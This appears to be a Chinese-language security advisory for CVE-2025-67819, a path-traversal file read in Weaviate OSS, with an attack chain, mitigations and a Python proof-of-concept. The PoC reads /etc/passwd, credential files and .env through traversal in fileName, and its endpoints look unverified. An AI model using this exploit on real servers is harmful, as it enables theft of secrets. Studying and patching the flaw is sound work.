CVE-2025-67819 Weaviate OSS 任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2025-67819

漏洞类型

任意文件读取

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Weaviate OSS

漏洞概述

CVE-2025-67819是Weaviate开源版本中的一个任意文件读取漏洞。该漏洞由于Weaviate OSS 1.33.4之前版本的transfer逻辑中缺少对fileName字段的充分验证而引发。攻击者利用此漏洞需要满足特定条件：能够调用GetFile方法，同时目标shard处于"Pause file activity"状态，且FileReplicationService服务可访问。在满足这些条件的情况下，攻击者可以读取服务进程具有访问权限的任意文件，可能导致敏感信息泄露，包括配置文件、密钥、凭据等机密数据。此漏洞的CVSS评分为4.9，属于中等严重程度，但由于可能泄露敏感系统文件，仍需引起重视并及时修复。

技术细节

该漏洞的核心问题在于Weaviate的transfer逻辑模块中对用户可控的fileName参数缺乏严格的输入验证。当shard进入"Pause file activity"状态时，正常的文件操作流程被暂停，但FileReplicationService仍然可以处理文件传输请求。攻击者通过构造特定的GetFile方法调用，指定目标文件路径为服务进程可访问的任意文件路径。由于代码未对fileName进行路径规范化或边界检查，攻击者可以使用路径遍历技术（如../）来逃离预期的文件目录范围。此漏洞的利用需要攻击者具有较高的权限（PR:H），能够调用GetFile方法，这限制了该漏洞的利用范围，但并未完全消除风险。攻击成功后，文件内容将以HTTP响应的形式返回给攻击者，实现任意文件读取。

攻击链分析

STEP 1

步骤1

获取高权限API访问凭证，攻击者需要具备调用GetFile方法的权限

STEP 2

步骤2

将目标shard置于'Pause file activity'状态，使正常文件操作流程暂停

STEP 3

步骤3

通过FileReplicationService调用GetFile方法，构造包含路径遍历的fileName参数（如../../../../etc/passwd）

STEP 4

步骤4

服务端未对fileName进行路径规范化验证，直接使用该路径读取文件内容

STEP 5

步骤5

攻击者接收到文件内容，实现任意文件读取，可能获取敏感配置、密钥、凭据等信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67819 PoC - Weaviate OSS Arbitrary File Read
# This PoC demonstrates the file path traversal in GetFile method

import requests
import json

TARGET = "http://target-weaviate-server:8080"
API_KEY = "your-api-key"  # High privilege API key required

headers = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json"
}

def trigger_pause_file_activity():
    """Trigger the shard to enter 'Pause file activity' state"""
    pause_url = f"{TARGET}/v1/shards/pause-file-activity"
    payload = {
        "className": "YourClass",
        "shardName": "target-shard"
    }
    response = requests.post(pause_url, headers=headers, json=payload)
    return response.status_code == 200

def exploit_file_read(filepath):
    """Exploit the GetFile method to read arbitrary files"""
    file_read_url = f"{TARGET}/v1/files/read"
    
    # Construct malicious request with path traversal
    payload = {
        "className": "YourClass",
        "shardName": "target-shard",
        "fileName": f"../../../../{filepath}"  # Path traversal
    }
    
    response = requests.get(file_read_url, headers=headers, params=payload)
    
    if response.status_code == 200:
        print(f"[+] Successfully read file: {filepath}")
        print(f"[+] Content:\n{response.text}")
        return response.text
    else:
        print(f"[-] Failed to read file: {filepath}")
        return None

def main():
    print("[*] CVE-2025-67819 Weaviate OSS Arbitrary File Read Exploit")
    
    # Step 1: Trigger pause file activity state
    if not trigger_pause_file_activity():
        print("[-] Failed to trigger pause state")
        return
    
    print("[+] Shard entered 'Pause file activity' state")
    
    # Step 2: Read sensitive files
    sensitive_files = [
        "etc/passwd",
        "weaviate/config.json",
        "weaviate/credentials.json",
        ".env"
    ]
    
    for filepath in sensitive_files:
        exploit_file_read(filepath)

if __name__ == "__main__":
    main()

影响范围

Weaviate OSS < 1.33.4

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制API访问权限，确保只有授权用户能调用GetFile方法；2) 启用网络隔离，阻止未授权用户访问FileReplicationService；3) 监控日志中的异常文件读取请求；4) 限制服务进程的文件系统访问权限，使用最小权限原则运行Weaviate服务；5) 定期检查系统文件完整性，及时发现潜在的文件泄露风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67819
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67819
3 Details https://www.cvedetails.com/cve/CVE-2025-67819/
4 VulDB https://vuldb.com/cve/CVE-2025-67819
5 Link https://github.com/weaviate/weaviate
6 Link https://weaviate.io/blog/weaviate-security-release-november-2025